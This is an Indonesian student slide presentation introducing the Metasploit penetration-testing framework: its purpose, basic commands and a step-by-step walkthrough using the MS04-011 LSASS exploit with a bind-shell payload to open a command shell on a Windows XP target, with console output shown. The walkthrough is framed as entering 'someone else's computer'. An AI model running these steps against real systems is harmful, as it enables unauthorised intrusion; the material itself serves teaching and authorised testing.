presentasi Metasploit

Preview:

Citation preview

MetasploitHauliza RindhayantiKezia Velda RobertaWilliam Gunawan

Metasploit

Pengenalan Metasploit Kegunaan Metasploit

Perintah Metasploit Keunggulan Metasploit

Command Metasploit

Advance Fitur

Metasploit Konsol

Metasploit GUI

Pengenalan Metasploit• metasploit framework adalah sebuah

penetration tool yang cukup powerfull untuk melakukan penestrasi ke dalam sebuah system.

• metasploit framework bisa juga dikatakan sebagai sebuah platform pengembangan untuk membuat tool security dan exploit

Back to metasploit

Pengenalan Metasploit• Metasploit framework sering dibuat dengan

menggunakan bahasa pemrograman Ruby

• Fungsi dasar dari metasploit framework adalah untuk memunculkan modul, membiarkan penggunanya mengkonfigurasikan modul exploit dan mencobanya pada target yang dituju

Pengenalan MetasploitMetasploit biasa dikaitkan dengan istilah remote exploitation, maksudnya walaupun penyusup sistem berada pada jarak jangkauan yang jauh tetapi dapat mengendalikan komputer korban.

Metasploit menyerang dengan cara mengirimkan exploit yang berisi payload yang sudah ditentukan oleh penyusup sistem pada komputer korban.

Pengenalan Metasploit Exploit merupakan software yang berfungsi untuk

memanfaatkan kelemahan pada software korban (misal web browser), setelah berhasil mengeksploitasinya exploit tersebut memasukkan payload ke dalam memori korban.

Walaupun exploit sering digunakan untuk menyerang kerapuhan keamanan (security vulnerability) yang spesifik namun tidak selalu bertujuan untuk melancarkan aksi yang tidak diinginkan. Banyak peneliti keamanan komputer menggunakan exploit untuk mendemonstrasikan bahwa suatu sistem memiliki kerapuhan.

Pengenalan MetasploitPayload merupakan sebuah file executable milik penyusup

yang akan di run pada komputer korban dengan tujuan dapat mengendalikan komputer tersebut secara remote atau memasang backdoor, trojan, virus, worm, dan lain-lain.

Payload dapat disusupi setelah bug berhasil di exploitasi oleh Metasploit Framework. Misal kita pilih payload Generic/Shell_Bind_TCP , artinya kita akan mengambil alih Shell Bind dari target hacking kita

Kegunaan Metasploit

Metasploit framework mempunyai banyak kegunaan dalam berbagai bidang diantaranya adalah :

Pada bidang keamanan jaringan untuk melakukan tes penetrasi

administrator sistem untuk memverifikasi instalasi dan patch sistemnya

vendor produk untuk melakukan tes kelemahan dan peneliti-peneliti keamanan lainnya di dunia

Kegunaan Metasploit

Riset dan penelitian eksploitasi keamanan

memahami cara kerja serangan

Tes penetrasi

Tes IPS/IDS

Dema atau presentasi

Legal hacking Back to metasploit

Perintah Metasploit

use exploitnameNama exploit yang di gunakan dalam exploit metasploit tersebut.

set RHOST hostname_or_ipUntuk mengetahui atau menginstuksikan target lewat remote host atau Ip target

set RPORT host_portUntuk mengatur port yang terhubung lewat remote host ke target tersebut.

set PAYLOAD linux/x86/shell_bind_tcpMengatur payload yang di gunakan lewat platform Linux x86 ke sebuah target ketika shell sudah terpasang.

Perintah Metasploit set LPORT local_port

Menetapkan port di server yang akan di xploit atau target exploit / rexploit

Memanfaatkan kode dari web yang telah di eksekusi , Yupz reload exploit / rexploit memungkinkan perubahan kecil tanpa harus retart konsole tersebut.

sessionsIni untuk membantu agar kita bisa berinteraksi dengan berbagai remote shell yang sudah kita tanam di target / server.

show optionsUntuk mengatur exploit dan payload , show exploits dan show payloads juga dapat menampilkan exploit / payload yang telah di eksekusi.

Back to metasploit

Keunggulan Metasploit Kompatibilitas User interface

metasploit mempunyai tampilan konsole yang interaktif, tampilan web yang dinamis, eksploitasi perintahnya interaktif,

Exploits Payloads auxiliary

Back to metasploit

Command pada MetasploitBerikut ini beberapa contoh command pada metasploit :

Command : msf > help (digunakan untuk melihat perintah-perintah pada metasploit framework)

Command : msf > show exploits (digunakan untuk mengetahui macam-macam exploit yang terkandung di dalam metasploit framework)

Command : msf > show payloads (digunakan untuk mengetahui macam-macam payload yang terkandung di dalam metasploit framework)

Back to metasploit

Metasploit KonsolBerikut ini beberapa langkah untuk masuk ke komputer orang lain :

1. Masuk ke konsol dengan menekan tombol CTRL+O.2. Setelah itu, maka akan muncul konsol spt ini

| | o _ _ _ _ _|_ __, , _ | | __ _|_ / |/ |/ | |/ | / | / \_|/ \_|/ / \_| | | | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/ /| \| =[ msf v3.1-release + -- --=[ 262 exploits - 117 payloads + -- --=[ 17 encoders - 6 nops =[ 46 aux msf >

5. Untuk load modul exploit, kita gunakan exploit lsassmsf > use windows/smb/ms04_011_lsass

6. Tentukan sistem operasi yang digunakan target, misal : target menggunakan XP msf exploit(ms04_011_lsass) > set target 2 target => 2

7. Tampilkan semua payload yang ada pada metasploit Framework msf exploit(ms04_011_lsass) > show payloads

8. karena kita ingin masuk ke dalam konsol, maka kita pilih payload generic/shell_bind_tcp. msf exploit(ms04_011_lsass) > set payload generic/shell_bind_tcp payload => generic/shell_bind_tcp

9. Selanjutnya, tentukan IP si target, misal IP target “192.168.113.14 “ msf exploit(ms04_011_lsass) > set RHOST 192.168.113.14 RHOST => 192.168.113.14

10. Kemudian,tinggal menjalankan perintah exploit... msf exploit(ms04_011_lsass) > exploit

output dari command exploit : [*] Started bind handler [*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.113.14[\lsarpc]... [*] Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.113.14[\lsarpc]... [*] Getting OS information... [*] Trying to exploit Windows 5.1 [*] Command shell session 3 opened (192.168.113.25:8471 -> 192.168.113.14:4444) [*] The DCERPC service did not reply to our request

Dapat dilihat pada output terdapat tulisan “Command shell session 3 opened” yang berarti kita sudah berhasil masuk ke dalam komputer korban dan shell kita di simpan di session 3.

11. Selanjutnya kita tampilkan isi sessionmsf exploit(ms04_011_lsass) > sessions -l

Active sessions =============== Id Description Tunnel -- ----------- ------ 3 Command shell 192.168.113.25:8471 -> 192.168.113.14:4444

12. Terakhir, kita masuk ke dalam session 3 tersebutmsf exploit(ms04_011_lsass) > sessions -i 3 [*] Starting interaction with 3... Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>

Back to metasploit

Advanced Fitur Meterpreter PassiveX Payloads Chainable Proxies Win32 UploadExec Payloads Win32 DLL Injection Payloads VNC Server DLL Injection

Back to metasploit

Metasploit GUIPilih modul exploits atau auxillary yang akan digunakan, double klik pada modul tersebut lalu ikuti langkah-langkahnya.

KILLBILL SMB EXPLOIT

Pilih target yang akan dieksploit

Pilih Payloads yang akan digunakan

Masukkan IP Target

Confirm Setting

Informasi Modul

Output Modul

TERIMA KASIH